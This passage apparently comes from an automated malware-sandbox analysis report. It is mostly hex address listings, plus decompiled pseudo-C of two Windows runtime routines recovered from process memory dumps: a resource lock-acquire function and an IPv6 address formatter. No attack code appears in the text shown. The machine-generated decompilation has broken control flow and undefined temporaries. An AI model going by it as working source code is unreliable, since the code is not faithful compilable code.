                                                                                                                                                      0x0097eb63
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eb70
                                                                                                                                                      0x0097eb75
                                                                                                                                                      0x0097eb7d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eb8c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eb8c
                                                                                                                                                      0x00950c96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950ca2
                                                                                                                                                      0x00950cac
                                                                                                                                                      0x00950cb4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950b44
                                                                                                                                                      0x00950b47
                                                                                                                                                      0x00950b49
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950b4f
                                                                                                                                                      0x00950b50
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950b56
                                                                                                                                                      0x00950b62
                                                                                                                                                      0x00950b7c
                                                                                                                                                      0x00950bac
                                                                                                                                                      0x00950a0f
                                                                                                                                                      0x0097eaaa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eac4
                                                                                                                                                      0x0097eac4
                                                                                                                                                      0x00950bd0
                                                                                                                                                      0x00950bd0
                                                                                                                                                      0x00950bd4
                                                                                                                                                      0x00950bd9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950bdb
                                                                                                                                                      0x00950be0
                                                                                                                                                      0x0097eb0e
                                                                                                                                                      0x00950a1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950a1a
                                                                                                                                                      0x0097eb1a
                                                                                                                                                      0x0097eb1f
                                                                                                                                                      0x0097eb27
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eb36
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eb36
                                                                                                                                                      0x00950bea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950bf6
                                                                                                                                                      0x00950c00
                                                                                                                                                      0x00950c03
                                                                                                                                                      0x00950c0b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950c0b
                                                                                                                                                      0x0097eaaa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950a15
                                                                                                                                                      0x00950bb6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950bc6
                                                                                                                                                      0x00950bc6
                                                                                                                                                      0x00950bcb
                                                                                                                                                      0x00950c15
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950c1d
                                                                                                                                                      0x00950c20
                                                                                                                                                      0x00950c21
                                                                                                                                                      0x00950c24
                                                                                                                                                      0x00950c24
                                                                                                                                                      0x00950c26
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950c26
                                                                                                                                                      0x00950bcd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950bcd
                                                                                                                                                      0x00950b89
                                                                                                                                                      0x00950b89
                                                                                                                                                      0x00950b90
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950b96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950b96
                                                                                                                                                      0x00950a04
                                                                                                                                                      0x00950a04
                                                                                                                                                      0x00950b9a
                                                                                                                                                      0x00950b9a
                                                                                                                                                      0x00950b9b
                                                                                                                                                      0x00950b9f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950ba5
                                                                                                                                                      0x00950ac7
                                                                                                                                                      0x00950aca
                                                                                                                                                      0x0097eacf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eade
                                                                                                                                                      0x0097eade
                                                                                                                                                      0x0097eae3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eaf3
                                                                                                                                                      0x0097eaf6
                                                                                                                                                      0x0097eaf7
                                                                                                                                                      0x0097eafe
                                                                                                                                                      0x0097eb01
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eb01
                                                                                                                                                      0x0097eacf
                                                                                                                                                      0x00950ad0
                                                                                                                                                      0x00950ad4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950ada
                                                                                                                                                      0x00950ae6
                                                                                                                                                      0x00950c34
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950c47
                                                                                                                                                      0x00950c49
                                                                                                                                                      0x00950c4a
                                                                                                                                                      0x00950c4e
                                                                                                                                                      0x00950c51
                                                                                                                                                      0x00950c54
                                                                                                                                                      0x00950c57
                                                                                                                                                      0x00950c5a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950c60
                                                                                                                                                      0x00950afb
                                                                                                                                                      0x00950afe
                                                                                                                                                      0x00950b02
                                                                                                                                                      0x00950b05
                                                                                                                                                      0x00950b08
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950b08
                                                                                                                                                      0x00950ae6
                                                                                                                                                      0x00950b44
                                                                                                                                                      0x009509f8
                                                                                                                                                      0x009509f8
                                                                                                                                                      0x009509f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eaa0
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fassign
                                                                                                                                                      • String ID: .$:$:
                                                                                                                                                      • API String ID: 3965848254-2308638275
                                                                                                                                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                      • Instruction ID: c83b3e10928f01a0504d1eaaeace5ad2196d40e8ed0cab7208212e9123c3becd
                                                                                                                                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                      • Instruction Fuzzy Hash: 0CA1B271D0030ADFDF24CF6AC8457BEB7B8AF96306F24896ADC82A7241D7345A49CB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00950554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E00950554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
									_push(_t144);
									_push(0);
									_t51 = E0090F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00954FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00963F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0099217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00963F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00953915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
												_push(_t138);
												_push(0);
												_t58 = E0090F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00954FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0099217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00963F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00953915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00935384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0090F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00953915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00953915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00953915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00935329(_t110, _t138);
																_t69 = E009353A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                      0x0095055a
                                                                                                                                                      0x0095055d
                                                                                                                                                      0x00950563
                                                                                                                                                      0x00950566
                                                                                                                                                      0x009505d8
                                                                                                                                                      0x009505e2
                                                                                                                                                      0x009505e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009505e7
                                                                                                                                                      0x009505e7
                                                                                                                                                      0x009505ea
                                                                                                                                                      0x009505f3
                                                                                                                                                      0x009505f3
                                                                                                                                                      0x00950568
                                                                                                                                                      0x00950568
                                                                                                                                                      0x00950568
                                                                                                                                                      0x00950569
                                                                                                                                                      0x00950569
                                                                                                                                                      0x00950569
                                                                                                                                                      0x0095056b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097217f
                                                                                                                                                      0x00972183
                                                                                                                                                      0x0097225b
                                                                                                                                                      0x0097225f
                                                                                                                                                      0x00972189
                                                                                                                                                      0x0097218c
                                                                                                                                                      0x0097218f
                                                                                                                                                      0x00972194
                                                                                                                                                      0x00972199
                                                                                                                                                      0x0097219d
                                                                                                                                                      0x009721a0
                                                                                                                                                      0x009721a2
                                                                                                                                                      0x009721ce
                                                                                                                                                      0x009721ce
                                                                                                                                                      0x009721ce
                                                                                                                                                      0x009721d0
                                                                                                                                                      0x009721d6
                                                                                                                                                      0x009721de
                                                                                                                                                      0x009721e2
                                                                                                                                                      0x009721e8
                                                                                                                                                      0x009721e9
                                                                                                                                                      0x009721ec
                                                                                                                                                      0x009721f1
                                                                                                                                                      0x009721f6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009721f8
                                                                                                                                                      0x009721fb
                                                                                                                                                      0x00972206
                                                                                                                                                      0x0097220b
                                                                                                                                                      0x0097220c
                                                                                                                                                      0x00972217
                                                                                                                                                      0x00972226
                                                                                                                                                      0x0097222b
                                                                                                                                                      0x0097222c
                                                                                                                                                      0x0097222f
                                                                                                                                                      0x00972232
                                                                                                                                                      0x00972235
                                                                                                                                                      0x00972235
                                                                                                                                                      0x0097223a
                                                                                                                                                      0x0097223f
                                                                                                                                                      0x00972241
                                                                                                                                                      0x00972243
                                                                                                                                                      0x00972248
                                                                                                                                                      0x00972248
                                                                                                                                                      0x0097224d
                                                                                                                                                      0x0097224f
                                                                                                                                                      0x00972262
                                                                                                                                                      0x00972263
                                                                                                                                                      0x00972268
                                                                                                                                                      0x00972269
                                                                                                                                                      0x00972269
                                                                                                                                                      0x00972269
                                                                                                                                                      0x0097226d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972276
                                                                                                                                                      0x00972279
                                                                                                                                                      0x0097227e
                                                                                                                                                      0x00972283
                                                                                                                                                      0x00972287
                                                                                                                                                      0x0097228a
                                                                                                                                                      0x0097228d
                                                                                                                                                      0x0097228f
                                                                                                                                                      0x009722bc
                                                                                                                                                      0x009722bc
                                                                                                                                                      0x009722bc
                                                                                                                                                      0x009722be
                                                                                                                                                      0x009722c4
                                                                                                                                                      0x009722cc
                                                                                                                                                      0x009722d0
                                                                                                                                                      0x009722d6
                                                                                                                                                      0x009722d7
                                                                                                                                                      0x009722da
                                                                                                                                                      0x009722df
                                                                                                                                                      0x009722e4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722e6
                                                                                                                                                      0x009722e9
                                                                                                                                                      0x009722f4
                                                                                                                                                      0x009722f9
                                                                                                                                                      0x009722fa
                                                                                                                                                      0x00972305
                                                                                                                                                      0x00972314
                                                                                                                                                      0x00972319
                                                                                                                                                      0x0097231a
                                                                                                                                                      0x0097231d
                                                                                                                                                      0x00972320
                                                                                                                                                      0x00972323
                                                                                                                                                      0x00972323
                                                                                                                                                      0x00972328
                                                                                                                                                      0x0097232d
                                                                                                                                                      0x0097232f
                                                                                                                                                      0x00972331
                                                                                                                                                      0x00972336
                                                                                                                                                      0x00972336
                                                                                                                                                      0x0097233b
                                                                                                                                                      0x0097233d
                                                                                                                                                      0x00972350
                                                                                                                                                      0x00972351
                                                                                                                                                      0x00972356
                                                                                                                                                      0x00972359
                                                                                                                                                      0x00972359
                                                                                                                                                      0x0097235b
                                                                                                                                                      0x0097235d
                                                                                                                                                      0x00935367
                                                                                                                                                      0x0093536b
                                                                                                                                                      0x00935372
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972363
                                                                                                                                                      0x00972363
                                                                                                                                                      0x00972369
                                                                                                                                                      0x0097236a
                                                                                                                                                      0x0097236c
                                                                                                                                                      0x00972371
                                                                                                                                                      0x00972373
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972379
                                                                                                                                                      0x00972379
                                                                                                                                                      0x0097237a
                                                                                                                                                      0x0097237f
                                                                                                                                                      0x0097237f
                                                                                                                                                      0x00972385
                                                                                                                                                      0x00972386
                                                                                                                                                      0x00972389
                                                                                                                                                      0x0097238e
                                                                                                                                                      0x00972390
                                                                                                                                                      0x00935378
                                                                                                                                                      0x0093537c
                                                                                                                                                      0x00972396
                                                                                                                                                      0x00972396
                                                                                                                                                      0x00972397
                                                                                                                                                      0x0097239c
                                                                                                                                                      0x009723a2
                                                                                                                                                      0x009723a3
                                                                                                                                                      0x009723a6
                                                                                                                                                      0x009723ab
                                                                                                                                                      0x009723ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009723b3
                                                                                                                                                      0x009723b3
                                                                                                                                                      0x009723b4
                                                                                                                                                      0x009723b9
                                                                                                                                                      0x009723ba
                                                                                                                                                      0x009723ba
                                                                                                                                                      0x009723bc
                                                                                                                                                      0x009723bf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00969153
                                                                                                                                                      0x00969158
                                                                                                                                                      0x0096915a
                                                                                                                                                      0x0096915e
                                                                                                                                                      0x00969160
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00969166
                                                                                                                                                      0x00969166
                                                                                                                                                      0x00969171
                                                                                                                                                      0x00969176
                                                                                                                                                      0x00969176
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00969160
                                                                                                                                                      0x009723c6
                                                                                                                                                      0x009723ce
                                                                                                                                                      0x009723d7
                                                                                                                                                      0x009723d7
                                                                                                                                                      0x009723ad
                                                                                                                                                      0x00972390
                                                                                                                                                      0x00972373
                                                                                                                                                      0x0097233f
                                                                                                                                                      0x0097233f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097233f
                                                                                                                                                      0x00972291
                                                                                                                                                      0x00972291
                                                                                                                                                      0x00972293
                                                                                                                                                      0x00972295
                                                                                                                                                      0x0097229a
                                                                                                                                                      0x009722a1
                                                                                                                                                      0x009722a3
                                                                                                                                                      0x009722a7
                                                                                                                                                      0x009722a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722ab
                                                                                                                                                      0x009722ad
                                                                                                                                                      0x009722af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722af
                                                                                                                                                      0x009722b1
                                                                                                                                                      0x009722b4
                                                                                                                                                      0x009722b4
                                                                                                                                                      0x009722b6
                                                                                                                                                      0x009353be
                                                                                                                                                      0x009353be
                                                                                                                                                      0x009353be
                                                                                                                                                      0x009353c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009353cb
                                                                                                                                                      0x009353ce
                                                                                                                                                      0x009353d0
                                                                                                                                                      0x009353d4
                                                                                                                                                      0x009353d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009353d8
                                                                                                                                                      0x009353e3
                                                                                                                                                      0x009353ea
                                                                                                                                                      0x009353ea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009353d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722b6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097228f
                                                                                                                                                      0x00972349
                                                                                                                                                      0x0097234d
                                                                                                                                                      0x00972251
                                                                                                                                                      0x00972251
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972251
                                                                                                                                                      0x009721a4
                                                                                                                                                      0x009721a4
                                                                                                                                                      0x009721a6
                                                                                                                                                      0x009721a8
                                                                                                                                                      0x009721ac
                                                                                                                                                      0x009721b6
                                                                                                                                                      0x009721b8
                                                                                                                                                      0x009721bc
                                                                                                                                                      0x009721be
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009721c0
                                                                                                                                                      0x009721c2
                                                                                                                                                      0x009721c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009721c4
                                                                                                                                                      0x009721c6
                                                                                                                                                      0x009721c6
                                                                                                                                                      0x009721c8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009721c8
                                                                                                                                                      0x009721a2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972183
                                                                                                                                                      0x0095057b
                                                                                                                                                      0x0095057d
                                                                                                                                                      0x00950581
                                                                                                                                                      0x00950583
                                                                                                                                                      0x00972178
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950589
                                                                                                                                                      0x0095058f
                                                                                                                                                      0x0095058f
                                                                                                                                                      0x00950583
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00972206
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                      • API String ID: 885266447-4236105082
                                                                                                                                                      • Opcode ID: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
                                                                                                                                                      • Instruction ID: 34a331877e6935b1f84647ee9600a8807eb2a515549d6a15d48567cc22dc07bc
                                                                                                                                                      • Opcode Fuzzy Hash: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
                                                                                                                                                      • Instruction Fuzzy Hash: DB511B727542056FEB14CB19CC81FA633ADAFD8711F21C229FD59DB286E971EC418790
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009514C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E009514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9f2088; // 0x774e5599
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00947707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00947707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00947707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00912340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0091E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                      0x009514c0
                                                                                                                                                      0x009514cb
                                                                                                                                                      0x009514d2
                                                                                                                                                      0x009514d6
                                                                                                                                                      0x009514da
                                                                                                                                                      0x009514de
                                                                                                                                                      0x009514e3
                                                                                                                                                      0x0095157a
                                                                                                                                                      0x0095157a
                                                                                                                                                      0x009514f1
                                                                                                                                                      0x009514f3
                                                                                                                                                      0x0097ea0f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ea15
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ea15
                                                                                                                                                      0x009514f9
                                                                                                                                                      0x009514f9
                                                                                                                                                      0x009514fe
                                                                                                                                                      0x00951504
                                                                                                                                                      0x0097ea1a
                                                                                                                                                      0x0097ea1f
